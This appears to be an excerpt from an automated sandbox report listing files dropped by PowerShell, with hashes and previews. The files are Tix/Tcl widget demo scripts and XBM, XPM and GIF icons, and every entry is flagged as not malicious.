                                                                                                                                                                                                              Preview:#define netw_width 32..#define netw_height 32..static unsigned char netw_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xfe, 0x7f, 0x00, 0x00, 0x02, 0x40,.. 0x00, 0x00, 0xfa, 0x5f, 0x00, 0x00, 0x0a, 0x50, 0x00, 0x00, 0x0a, 0x52,.. 0x00, 0x00, 0x0a, 0x52, 0x00, 0x00, 0x8a, 0x51, 0x00, 0x00, 0x0a, 0x50,.. 0x00, 0x00, 0x4a, 0x50, 0x00, 0x00, 0x0a, 0x50, 0x00, 0x00, 0x0a, 0x50,.. 0x00, 0x00, 0xfa, 0x5f, 0x00, 0x00, 0x02, 0x40, 0xfe, 0x7f, 0x52, 0x55,.. 0x02, 0x40, 0xaa, 0x6a, 0xfa, 0x5f, 0xfe, 0x7f, 0x0a, 0x50, 0xfe, 0x7f,.. 0x0a, 0x52, 0x80, 0x00, 0x0a, 0x52, 0x80, 0x00, 0x8a, 0x51, 0x80, 0x00,.. 0x0a, 0x50, 0x80, 0x00, 0x4a, 0x50, 0x80, 0x00, 0x0a, 0x50, 0xe0, 0x03,.. 0x0a, 0x50, 0x20, 0x02, 0xfa, 0xdf, 0x3f, 0x03, 0x02, 0x40, 0xa0, 0x02,.. 0x52, 0x55, 0xe0, 0x03, 0xaa, 0x6a, 0x00, 0x00, 0xfe, 0x7f, 0x00, 0x00,.. 0xfe, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1431
                                                                                                                                                                                                              Entropy (8bit):3.450442916925295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:UGIZfbLlIT09wSpoCIR9J58Hr7bN65S65S6c6E6ZS6EcS7WEarkv5j5jFNZjrOsJ:jIZfHlIgySuRXeDw5D5DltZVB3rwNdOC
                                                                                                                                                                                                              MD5:5165AAE8ED4C6EE20B9AA6C3304E8042
                                                                                                                                                                                                              SHA1:2404F7443E8797E335DD6BD93D8CF67DEC291482
                                                                                                                                                                                                              SHA-256:068E6F025C1E4BB5B019FF51416FCEDD4E5D211D5FCA99412B19DED1295B2556
                                                                                                                                                                                                              SHA-512:BA573C5EB9F92F5C31236A35B021B366E4450B26F077F4C0F18FFD7F83A590E8E8415F7ECF057186AE0B0178BA04B13F5060C705C4A05FDD1A1ED4FFB911D0A9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * netw_xpm[] = {../* width height ncolors chars_per_pixel */.."32 32 7 1",../* colors */.." .s None.c None",.."..c #000000000000",.."X.c white",.."o.c #c000c000c000",.."O.c #404040",.."+.c blue",.."@.c red",../* pixels */.." ",.." .............. ",.." .XXXXXXXXXXXX. ",.." .XooooooooooO. ",.." .Xo.......XoO. ",.." .Xo.++++o+XoO. ",.." .Xo.++++o+XoO. ",.." .Xo.++oo++XoO. ",.." .Xo.++++++XoO. ",.." .Xo.+o++++XoO. ",.." .Xo.++++++XoO. ",.." .Xo.XXXXXXXoO. ",.." .XooooooooooO. ",.." .Xo@ooo....oO. ",.." .............. .XooooooooooO. ",.." .XXXXXXXXXXXX. .XooooooooooO. ",.." .XooooooooooO. .OOOOOOOOOOOO. ",.." .Xo.......XoO. .............. ",.." .Xo.++++o+XoO. @ ",.." .Xo.++++o+XoO. @ ",.." .Xo.++oo++Xo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2337
                                                                                                                                                                                                              Entropy (8bit):2.530180247378308
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:j69tth/q7wh6qAqgjttbxQLY1I4qYiXgDhoSA1shStthfaM3aSCWY/+Attp:p
                                                                                                                                                                                                              MD5:6250692F75132D045ECEB40289207BF1
                                                                                                                                                                                                              SHA1:8D79A2F1DB451E7B8C559FFBA4FE9A04E19C9F2D
                                                                                                                                                                                                              SHA-256:BAD1392A412BDC5B8C9DA18BCFB5E92D7623875FFD49E321DD8F322039238302
                                                                                                                                                                                                              SHA-512:F1F67B13794D10EE431CE0B64F6FFC24EFF7F20BB1F748B6B8B02F5DEE52387BEF18ECEC856B5FEC64556110F23C174B4499ECE6C563A8A97D891695714E654A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * optmenu_xpm[] = {.."50 40 5 1",.." .s None.c None",.."..c white",.."X.c gray80",.."o.c gray50",.."O.c black",.." ",.." ",.." .............................. ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXXOXOXXOXXOXXXXOOXXXXXXXXXXo ",.." .XXXOXOXXOXOXXXOXXOXXXXXXXXXXo ",.." .XXXXOXXOXXOXXXOXXXOXXXXXXXXXo ",.." .XXXXOXXXOXXOOXXOXOXXXXXXXXXXo ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXo ",.." .XXXXXXXXXXXXXXXXXXXXXXXXXXXXo.............o ",.." .............................o o ",.." ..XXXOXXXXXOXXXXXXXXOXXXXXXXOo o ",.." ..XXOXOXOXXOXOXXXOXXOXXXXXXXOo ...... o ",.." ..XXXOXXXOXXOXXXOXXXOXXXXXXXOo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):296
                                                                                                                                                                                                              Entropy (8bit):3.8377538283360546
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:HDKAtR4nNcorM0tRZ1UToDJMIiDDLxfHXjvFJvFJvFJvFJvFJvjJvDHDJvFJvcdK:HeAY6orM0BpD9aDVfHkDuvXZG63
                                                                                                                                                                                                              MD5:551C91D6B75601F0F035D962C1FD505F
                                                                                                                                                                                                              SHA1:AC9158E18DCD98D4727FD9F37E4F4FD3ED04AF95
                                                                                                                                                                                                              SHA-256:58B8D96204593545EE5673CF4D5E09B14C7B922BC95DFD0AF7310691CD5E5631
                                                                                                                                                                                                              SHA-512:126AF4FB6FE1B6E8795BB37B1D2423C6B87EDABBF818C5DAEEDED5217CAD91B8B1FDD691699BD7B60195A803BC730EA3DDC08FBD539AD394D1CC0D330C58E78C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define rightj_width 16..#define rightj_height 16..static unsigned char rightj_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0xdb, 0x00, 0x00, 0x70, 0xdb,.. 0x00, 0x00, 0x00, 0xef, 0x00, 0x00, 0xd8, 0xde, 0x00, 0x00, 0xc0, 0xdd,.. 0x00, 0x00, 0xa0, 0xef, 0x00, 0x00, 0xd8, 0xde};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:X pixmap image, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2408
                                                                                                                                                                                                              Entropy (8bit):2.599808695772341
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:jpA9Y1fkCDC7ww+LFqkOq63S5/AB4E1TP:1Qc50
                                                                                                                                                                                                              MD5:63D6362CFD7D673C4827411125735EF3
                                                                                                                                                                                                              SHA1:F10C8DA8676DAF095C7432176CC50BF34D4519CE
                                                                                                                                                                                                              SHA-256:B13247F797E9BA8D9EE80B3AD356BF7F24FDAD80386A7AB3937DBFD25323EE95
                                                                                                                                                                                                              SHA-512:D733D1D9EEA9868405D4624F2AA30DFEDCE46EC77FDC6D980DE3D73411B6ACEB6CABC304668145A91B7CDD9D690FBFF1223A0026B7A3109A55AB301EDEA1C7DE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:/* XPM */..static char * select_xpm[] = {.."50 40 9 1",.." .s None.c None",.."..c black",.."X.c gray95",.."o.c gray50",.."O.c gray70",.."+.c navy",.."@.c #000080800000",.."#.c #808000000000",.."$.c white",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." ",.." .............................................. ",.." .XXXXXXXXXXooooooooooooXXXXXXXXXXXoXXXXXXXXXX. ",.." .X ooOOOOOOOOOOXX oX o. ",.." .X ooOOOOOOOOOOXX oX o. ",.." .X ++++ ooOOOOOOOOOOXX ... oX @ o. ",.." .X +++++ ooOOOOOOO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:GIF image data, version 87a, 252 x 213
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11042
                                                                                                                                                                                                              Entropy (8bit):7.966888040729549
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:6m5ZbG3Vb2GGmLxoREKwfPy1UlpReQ906KgYRDx+oetsuLf7v3kL29sZLPm7s+H:P8amLxoOKwfa1mX99YRDx+ztTfbL9sZK
                                                                                                                                                                                                              MD5:9586106E578A263CF24F4878B2F98851
                                                                                                                                                                                                              SHA1:D1773A2FBCCCADFD6B79F521759416EB691C8B66
                                                                                                                                                                                                              SHA-256:DB223D088B0B41EA77614EC7FBFCDE1132F68B2E1C3E40C7C1871A541DF625AC
                                                                                                                                                                                                              SHA-512:FF7749B0B8B498FA0B9636FA8CEFF17BD707939890D399C9C58045868E0ED7040BF915CD7BD8466A3834C7B4968FCBEF9565B7B592ED84A6E9A2EEAF1C951E6C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:GIF87a.......................................................,........@....I..8...`(.di.h... ....q...l....pHt.}...<..L\q.\R.....5v....I...g.,S..*....I..r...F.Rh|.fN..cG@h?K._v.g^.TuW.Ska.mpor*,.|iV..j.iQu....yl.~..O~^..D...L....O)/(..Z6.....`....U.[.z.J.._...w.[l.M...U...Z...djce.3...H......L`..!...h..". .+8..p...@..H....A....Q..8..8....+c......Y*....10r...pB..h..S..B.....R...d.Pp.T.`.......f..H..i....\:.`Y.k......d.^.-.3.$.6...eT0....=P.k..z....6.W...][.t..m..u.tu..@..L.v..fW...x...A.r..F.n..c.<@.e...}m..j...b-.P....Q......_..........;..........k=jf.Pa...X.V.....fZk).._W..(.v.U5J4...^aN..L..e.0....Ir.@G+...W.yu`W1.#cAk.. A.|.......~3..bA*%.T.<.Op..R.-....{.$..+D\d.`.).b*`.....f..Y......`t^...S.....{..T........fh:.LIb9.(ve......x!.......y..f.E....i.L_..Vvp..V...........pX......D......zW..)P&..r..@Ur5w_\...j.5..d.a...:5...6.#..eF..1..&.h.....,.z].'nf...sBFem....T.lM.U..2{gS...e...+...p.M.c.4l.D,p..R.e.._..#..wY....D.G[foM...[.v.R.5ws...g.|..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (16x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):305
                                                                                                                                                                                                              Entropy (8bit):3.9938614470249565
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:HeAqLwJvorM0qLwJgC1D9lL8RfHAkaqLkt+VQ2Q2Q2Q2QiLqvIhKYey:HeKvaLgC1JlIWkaqLkt+C2Q2Q2Q2Qi9x
                                                                                                                                                                                                              MD5:88172FE309806CA8A94E076765ADB49D
                                                                                                                                                                                                              SHA1:59D410D550F53724D33CCC8240A61F8B76BD39CC
                                                                                                                                                                                                              SHA-256:4B14B64E1D86DE5A5528978F0C5457127B983F41BBBFF39CAA4A03C1E466B51C
                                                                                                                                                                                                              SHA-512:7AF3CA33CC39BB229A583AC872DC1310ABCB3CC46124846D0AFD61188B2ED31FA7BB21D078677FCFC26BD84700D307D24CB7680F6BDF49892F49C9DCA696C451
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#define underline_width 16..#define underline_height 16..static unsigned char underline_bits[] = {.. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x1c, 0x38, 0x1c,.. 0x30, 0x0c, 0x30, 0x0c, 0x30, 0x0c, 0x30, 0x0c, 0x30, 0x0c, 0x70, 0x0e,.. 0xf0, 0x0f, 0xe0, 0x07, 0x00, 0x00, 0xf8, 0x1f};..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5001
                                                                                                                                                                                                              Entropy (8bit):5.01771748476717
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:bXhU2YtDcka1AUxV54VHNsCnPrVzM+KPsn68laliP:rS2YsxUVtNBXeq5IliP
                                                                                                                                                                                                              MD5:5382B8E31656B222C54FE219E8CD51E1
                                                                                                                                                                                                              SHA1:01454FF87304E402DCC389BB7A77F29EB77D5A47
                                                                                                                                                                                                              SHA-256:8109F373097ED5DE015E9FBFDF6FC8CE38E0F62B04D6BA103584AE773967AFBF
                                                                                                                                                                                                              SHA-512:F5779BACCD0B4EC1D4C8A1994256B692FB77E428F262F87E40FC18AD4CA8822D1A4536F1339D6C2710F90403C8F386D925A7A2A4C0781F0F99BDCE4D910AE198
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: AllSampl.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $..#..# AllSampl.tcl --..#..#.This file is a directory of all the sample programs in the..#.demos/samples subdirectory...#..#..# Copyright (c) 1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#....# The following data structures contains information about the requirements..# of the sample programs, as well as the relationship/grouping of the sample..# programs...#..# Each element in an info list has four parts: type, name, group/filename, and..# condition. A group or a file is loaded only if the conditions are met...#..# types: "d" directory "f" file..# conditions:..#."i":.an image type must exist..#."c":.a command must exist..#."v": .a variable must exist....set root {.. {d "File Selectors"..file.}.. {d "Hierachical
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:xbm image (15x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4952
                                                                                                                                                                                                              Entropy (8bit):4.860104850681445
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:vfW3qSzfqAS2kf0xsD/Nri4FpmYRERPR6r4A/0Por3cDc4fZbv93C:ve3qSzfqAS2kfN5qtRvH/ZRS
                                                                                                                                                                                                              MD5:5A62E920C2B23E97CED57E4E059EEEAA
                                                                                                                                                                                                              SHA1:70773923FD0BD5A6CAD8E33160E453CF401A3817
                                                                                                                                                                                                              SHA-256:996236D970676EF16C670F7B13AEFCD17805BEC57ABAD679C6BFF36908BF3061
                                                                                                                                                                                                              SHA-512:77A6ECAEF85B5F95BE517CAD3670302553DBCDF3516B10639A9DD41644A6816EDCDF50AA1E6552D5817ADBDD2A5AF1F5DD278D4F3FB0624E4520D60C7286ABE5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: ArrowBtn.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates how to write a new Tix widget class...#....# ArrowBtn.tcl --..#..#.Arrow Button: a sample Tix widget...#..set arrow(n) [image create bitmap -data {.. #define up_width 15.. #define up_height 15.. static unsigned char up_bits[] = {...0x80, 0x00, 0xc0, 0x01, 0xe0, 0x03, 0xf0, 0x07, 0xf8, 0x0f, 0xfc, 0x1f,...0xfe, 0x3f, 0xc0, 0x01, 0xc0, 0x01, 0xc0, 0x01, 0xc0, 0x01, 0xc0, 0x01,...0xc0, 0x01, 0xc0, 0x01, 0x00, 0x00};..}]..set arrow(w) [image create bitmap -data {.. #define left_width 15..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1769
                                                                                                                                                                                                              Entropy (8bit):4.793179191493078
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:M2usaLB/8eMyIvFY93VVALSFdx7wDUl6Rx2GaPX1xS/etdfM9QnGk2PSsRs9v:YyXvk3V8S3xq/RxXaNg/TiG9P1Rs9v
                                                                                                                                                                                                              MD5:C3B72D41EB12D2A9D83BE52035900FDE
                                                                                                                                                                                                              SHA1:BAB48A8699E87A3109869030B145D4D09E0B169B
                                                                                                                                                                                                              SHA-256:89B2310E8294FD5CF42D6F8DEF61A4634090DCC825E4524B34015E56F76EE0D6
                                                                                                                                                                                                              SHA-512:8F365F55CBF1AABC63F432A9F2EB85BDC9AD39C4EECF726A10DDFD822C5E7169CD73D9EF6DCA27993E79E387EC28E150A172BB9F522788F7302F44775FBCE136
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Balloon.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixBalloon widget, which provides..# a interesting way to give help tips about elements in your user interface...# Your can display the help message in a "balloon" and a status bar widget...#..proc RunSample {w} {.... # Create the status bar widget.. #.. label $w.status -width 40 -relief sunken -bd 1.. pack $w.status -side bottom -fill y -padx 2 -pady 1.... # These are two a mysterious widgets that need some explanation.. #.. button $w.button1 -text " Something
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2051
                                                                                                                                                                                                              Entropy (8bit):4.79299689228989
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:yyXv0uFjLUAB8jNvLJJ0YNFM9WI8PZs1G7ml1uh1qn1B7TP1Ri:hfjvUAINvXNW9R8hoG7mlch4nrT3i
                                                                                                                                                                                                              MD5:FAF3F31ADCCD3752735BF67E1EED9E94
                                                                                                                                                                                                              SHA1:BE81947DEB6675EEDD22700339B1EB8E8C67B7BE
                                                                                                                                                                                                              SHA-256:6844A0AF067A3C68D1A953CF8CB21CBEF2FA9C04985DEB4ABEA643BFD35C1993
                                                                                                                                                                                                              SHA-512:6DB95938C5B57800D11DCB7E6EB5585948B3D02F7ECBDB3D54C26356522EE31C5F73DF4B3A7577762AB2A76AAA7A775D7B0F37471CD9021AD371C379876496DD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: BtnBox.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixButtonBox widget, which is a..# group of TK buttons. You can use it to manage the buttons in a dialog box,..# for example...#..proc RunSample {w} {.... # Create the label on the top of the dialog box.. #.. label $w.top -padx 20 -pady 10 -border 1 -relief raised -anchor c -text \..."This dialog box is\n a demostration of the\n tixButtonBox widget".... # Create the button box and add a few buttons in it. Set the.. # -width of all the buttons to the same value so that
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2654
                                                                                                                                                                                                              Entropy (8bit):4.926232453278272
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:VdyXvZaHT3hqP92RSD0A3YXJuvA3OhfkFX8qHERHhkP1Rpv:SfZcTUP9yXA3KJuI3OuFX8rRHhk3pv
                                                                                                                                                                                                              MD5:16749BEA5D89590DEEE2D1BD50E6373F
                                                                                                                                                                                                              SHA1:EE76AB87597642F3F7A98BEF20471C56AA6FD5A0
                                                                                                                                                                                                              SHA-256:F0816B6A13F3E73DD47F5EFB4D8821CFFF3A51E5B259DCA240F8897546413B08
                                                                                                                                                                                                              SHA-512:9B7BC0CB66FEB4F54709BAC6B46824131647D767229B78230F8C45128CA95E76F6F28EF4E51BE296CA32FC01CB8A48ABF7CDC31240B4EF665BCDDA15845DB43F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: CObjView.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This program demonstrates the use of the CObjView (Canvas Object..# View) class...#..# $Id: CObjView.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $....proc RunSample {w} {.. label $w.lab -justify left -text \.."Click on the buttons to add or delete canvas..objects randomally. Notice the scrollbars automatically..adjust to include all objects in the scroll-region.".... pack $w.lab -anchor c -padx 10 -pady 6 -side top.. frame $w.f.. pack $w.f -side bottom -fill y.. tixCObjView $w.c.. pack $w.c -expand
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5487
                                                                                                                                                                                                              Entropy (8bit):4.768916588115309
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:sfCyv2eW7uLpyS99atFLT5sRlRcV4DFvuLFZtdxarIP99J40e1f057qTvHTgIRSO:s6M2ehLpb/a7LTMSV3LftrarIPpjC0Ud
                                                                                                                                                                                                              MD5:1A891B7B763AE0F70C7D3285B94B200E
                                                                                                                                                                                                              SHA1:F93D9D62C173314E2F9642C719547596F2C03A8D
                                                                                                                                                                                                              SHA-256:7F8F6F64DB23DA5C647E80B9FA3DCEE09226D01CC2CB7AE2B9D54065C710599E
                                                                                                                                                                                                              SHA-512:DD52ECB4DA3BA04C553950934A189D2E84F78D7D76FBC9D6C69A2B996B4AE6783A3E3DD0B2CCF828714995831027392A8EBA94A9F24A3ADABC2AF4EB21FAA566
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: ChkList.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This program demonstrates the use of the tixCheckList widget...#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... #------------------------------------------------------------.. # Create the 1st CheckList (Multiple Selection).. #.. set f [frame $top.f1].. pack $f -side left -expand yes -fill both -padx 4.... set l [label $f.l -text "Cho
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2023
                                                                                                                                                                                                              Entropy (8bit):4.690581354001254
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:M2usalB/8eMyIvhvTrw0swb0loIEFZu9BkfWOM8KpaBjlmsHEo0nBVuPSsRi:0yXvhbrw0swb0l3UfWBemQh0nHuP1Ri
                                                                                                                                                                                                              MD5:9594CF470223046D037A5D2BDEEF13B4
                                                                                                                                                                                                              SHA1:643804694D3F9EB8BC619EDB2E517471E5AE7328
                                                                                                                                                                                                              SHA-256:5DC11A3DC49AFDB95D7FC693C45D939CAB0CDA1027A8507DEA015FDF5B8CC6A3
                                                                                                                                                                                                              SHA-512:12295C0DF2CC5FF27995B4B280854844A438E47A5D8B6C21F22127927EB45C34D7C763899C537DC7C6DC0CB620E358DAA6E4A4650B66C5A8C8C159C034D600E0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: CmpImg.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the compound images: it uses compound..# images to display a text string together with a pixmap inside..# buttons..#..proc RunSample {w} {.... set img0 [tix getimage network].. set img1 [tix getimage harddisk].... button $w.hdd -padx 4 -pady 1 -width 120.. button $w.net -padx 4 -pady 1 -width 120.... # Create the first image: we create a line, then put a string,.. # a space and a image into this line, from left to right... # The result: we have a one-line image that
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6163
                                                                                                                                                                                                              Entropy (8bit):4.463721872337389
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:+f9NjIgwXKnJeMRpMM+ibsSIt1bwNsSOSkA3i:+lB6NMRpMM+iISIt1bwNspSkAy
                                                                                                                                                                                                              MD5:27862580E5E9B6F08FBF98E38C09917A
                                                                                                                                                                                                              SHA1:3440858C3803E1F4742B2BE58963D5962D56719B
                                                                                                                                                                                                              SHA-256:AA89DAE58D3B9B9A10A162F5B71AD72F3F25F89F464AE516539344603FB75BC3
                                                                                                                                                                                                              SHA-512:33D8CA2C96EDE3DEAB204682FC5A44F2B3342E38EEEDB4713C2EBB6B33830CC70A92C8280B4997635188C6C2FDB44BF01BF952FF07AE4DE803C76E00263A3DCE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: CmpImg1.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixNoteBook widget, which allows..# you to lay out your interface using a "notebook" metaphore..#....proc RunSample {w} {.... # We use these options to set the sizes of the subwidgets inside the.. # notebook, so that they are well-aligned on the screen... #.. set name [tixOptionName $w].. option add *$name*TixControl*entry.width 10.. option add *$name*TixControl*label.width 18.. option add *$name*TixControl*label.anchor e.. option add *$name*TixNoteBook*tabPa
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4649
                                                                                                                                                                                                              Entropy (8bit):4.723855202032839
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Xf46/6ZwsXdgwovaBcDpaYcX9Sn3U9753i:XRMBovaBcDpaYcX8k975y
                                                                                                                                                                                                              MD5:8163A1BEBD3A59855DC57E5F420E4260
                                                                                                                                                                                                              SHA1:77CFA4FD162AB4852A72E2162099277903A0E9BB
                                                                                                                                                                                                              SHA-256:FCBD3916070C96685686A53AD1D96C71CD318CB4412A589C3339C0E32DABF7A0
                                                                                                                                                                                                              SHA-512:8734BB4770B8045CB861008ADF8515D9477351EAF2BA2394DC9098E917FFCE2312EB22E493FE43A597BAE1349F179EB193166EFF33F89EE12FF1BD645322CE0D
                                                                                                                                                                                                              Malicious:false
